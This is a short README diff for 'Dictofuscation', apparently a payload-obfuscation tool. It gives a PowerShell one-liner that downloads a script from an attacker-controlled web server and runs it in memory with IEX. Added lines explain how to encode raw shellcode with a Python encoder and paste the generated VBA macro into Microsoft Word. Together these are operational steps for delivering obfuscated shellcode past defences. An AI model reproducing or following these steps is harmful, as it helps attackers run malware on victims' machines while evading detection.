ProcessusT/Dictofuscation/README.md

     > Open a Powershell windows on the client side and make an in-memory execution : iwr http://yourwebserveripaddress/generated_code.ps1 | IEX

+# For VBA :
+    > Generate your RAW shellcode file
+    > Use the encoder to obfuscate it : python.exe .\encode_vba.py .\payload.bin
+    > Open word, create a new macro and paste the generated_macro.vba content in it

 <br /><br /><br />